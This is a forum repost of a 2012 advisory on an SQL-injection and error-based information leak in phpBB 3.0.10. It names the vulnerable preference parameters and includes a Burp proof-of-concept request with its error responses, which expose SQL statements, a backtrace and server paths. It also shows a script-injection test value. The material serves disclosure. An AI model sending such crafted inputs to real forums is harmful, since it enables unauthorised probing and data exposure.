• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

phpBB v3.0.10 SQL Injection Vulnerability

Admin

Well-Known Member
Staff member
Administrator
------------------------------------------------------------------
Name : phpBB3 SQL Injection
------------------------------------------------------------------
Version : 3.0.10
------------------------------------------------------------------

1) What is it?

This is very nice forum board. You should try it!
------------------------------------------------------------------
2) Type of bug?
SQL Injection (or SQL-info-Leak if You want).
------------------------------------------------------------------
3) Where is the bug?
Vulnerable parameter seems to be 'style' because if we set up this parameter
to 'bigger number' (for example: 111111111) we will get an error, with full SQL
statement.

*updated - dateformat is the second vulnerable parameter!
*updated - post_st is the 3rd vulnerable parameter!
*updated - another one: topic_st


4) PoC traffic from Burp:
4.1) Request :


---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kub...3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


<!DOCTYPE html PUBLIC "(...)

<a href="./">Return to the index page</a> </div> <div id="acp"> <div class="panel">
<div id="content">
<h1>General Error</h1>
<div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br />
<br />SQL<br /><br />UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2<br />
<br />BACKTRACE<br /><div style="font-family: monospace;"><br />
<b>FILE:</b> [ROOT]/includes/db/mysqli.php<br />
<b>LINE:</b> 182<br />
<b>CALL:</b> dbal->sql_error()<br /><br />
<b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php
<br /><b>LINE:</b> 100<br />
<b>CALL:</b> dbal_mysqli->sql_query()<br /><br />
<b>FILE:</b> [ROOT]/includes/functions_module.php<br />
<b>LINE:</b> 507<br />
<b>CALL:</b> ucp_prefs->main()<br />
<br /><b>FILE:</b> [ROOT]/ucp.php<br />
<b>LINE:</b> 333<br />
<b>CALL:</b> p_master->load_active()<br />
</div><br /></div>
<p>Please notify the board administrator or webmaster: (...)

---


4.2 Other response (this time from post_st parameter):
---
</style></head><body id="errorpage"><div id="wrap">
<div id="page-header">
<a href="./">Return to the index page</a>
</div> <div id="acp"> <div class="panel">
<div id="content">
<h1>General Error</h1>
<div>SQL ERROR [ mysqli ]<br /><br />
Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]
<br /><br />An SQL error occurred while fetching this page.
Please contact the <a href="(...)
---

5) More?

- Ethical hacking for Your company:
http://hauntit.blogspot.com

- Burp Proxy:
http://www.portswigger.org

- phBB3 Download:
http://www.phpbb.com


Nguồn: 1337day.com
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Admin Share code phpBB 3.3.3 tiếng việt mới nhất Phpbb3x 2
Admin Share code phpBB 3.3.1 tiếng việt mới nhất Phpbb3x 4
Admin Redirection Script for phpBB 3.2/3.3+ (without SEO URLs) htaccess Xenforo 0
H Hỏi giúp về homeurl source phpbb ** Phpbb3x 3
N Help xin code , tạo icon , trước tên thành viên , của forum phpbb 3.11 Phpbb3x 0
Admin Hướng dẫn rewrite url cho phpbb seo trên nginx VPS & Dedicated Server 0
T Hỏi Ai Thạo Nukeviet Vào Phpbb Vào Giúp Em Xíu All Shared Scripts 7
Admin Share game caro online cho phpbb Phpbb3x 0
Admin Share mobile phpbb của yeuit.biz hiện tại Phpbb3x 0
Master_Thuan Hướng dẫn Tạo keylog cực kìđơn giản với forum PhpBB 3.x Security - Local - Hacking 0
DragonHunter Share code Phpbb 3.0.8 wWw.Vaonet.Tk Hack Full Mod [Mới Nhất] Phpbb3x 0
Admin Tổng hợp 1 số bản mod phpbb ** Phpbb3x 0
Admin Seo thanks for post phpBB - Tích hợp mod thanks và phpBB seo Phpbb3x 0
Admin Share code phpbb 3.0.11 boxhay.net Phpbb3x 0
S Hỏi cách loại bỏ Portal của Phpbb Phpbb3x 7
Admin Board watch for phpbb 3.0.11 Phpbb3x 1
Admin Lang việt phpbb 3.0.11 Phpbb3x 0
Admin [MOD] Ultimate Points1.1.0 - Tiền tệ cho phpBB Phpbb3x 0
Admin Share code phpbb cho forum di động Phpbb3x 7
Admin [phpbb] Mod Browser, os & screen v 0.3.0 Phpbb3x 0
Admin [Mod] NV recent topics 1_0_6 for phpBB Phpbb3x 0
Admin Mod tự động chuyển đổi giao diện wap web cho phpbb Phpbb3x 0
Admin [MOD] Advertisement Management - Quản lý quảng cáo cho phpBB Phpbb3x 1
Admin Share code phpbb.buidoi.net Phpbb3x 0
Della007 Share Share code phpBB 3.0.11 hack mod cần thiết by NTĐ Phpbb wap 0
Admin Fake use online for phpbb wap v7 Phpbb wap 0
Admin [MODDB]Post number in viewtopic - Hiện số thứ tứ bài viết cho phpBB ** Phpbb3x 0
Admin Share code phpBB 3.0.11 hack mod cần thiết by NTĐ Phpbb3x 5
Admin Share code phpbb-seo 3.0.11 Phpbb3x 5
Admin Thiết lập gởi Email SMTP cho PHPBB Phpbb3x 0
Admin Share mod tạo # bài viết giống vbb cho phpbb Phpbb3x 0
Admin phpBB SEO Premod V 3.0.11 Phpbb3x 0
Admin Phpbb đã ra mắt phiên bản 3.0.11 download now Phpbb3x 0
1 [you] giúp tớ desinger phpbb Kiến thức lập trình 10
T Share code phpBB mod by Thuan9xpro Phpbb3x 7
Admin [Fix] lỗi url link tiếng việt của phpbb-seo Phpbb3x 13
Z Help Tìm người cùng làm wap phpbb Phpbb3x 2
Admin Cài đặt tường lửa InV-Firewall Script cho diễn đàn bạn [IPB / phpBB /vBulletin] Chống local, attack, symlink, ddos 0
Admin Hướng dẫn chuyển từ phpBB sang Xenforo bằng hình ảnh Kiến thức lập trình 3
T Hỏi cách việt hoá mã nguồn phpbb-wap nhanh. Phpbb wap 10
1 [PHPBB] Thỉnh thầy chatbox + chém tự động ver 1.0 Phpbb3x 9
N Help Admin hướng dẫn đệ add mod thank phpbb với Phpbb3x 10
Admin Mod tự động xóa nick không kích hoạt trong 24h phpbb ** Phpbb3x 0
C Hướng dẫn thêm thành viên vào nhóm cho phpbb Phpbb3x 1
N Phpbb bỉ lỗj trang trắng Phpbb3x 13
K Xin HD làm forum phpBB Phpbb3x 12
Admin Hướng dẫn add mod cho phpbb Phpbb3x 2
K Xin hướng dẫn cài mod cho phpBB Phpbb3x 1
vancongpham Share code hay, mã nguồn phpBB Wap phiên bản 8.0 - download zipcode free. Phpbb3x 0
Admin Share code phpbb-wap v8 Phpbb wap 1

Similar threads

New posts New threads New resources

Back
Top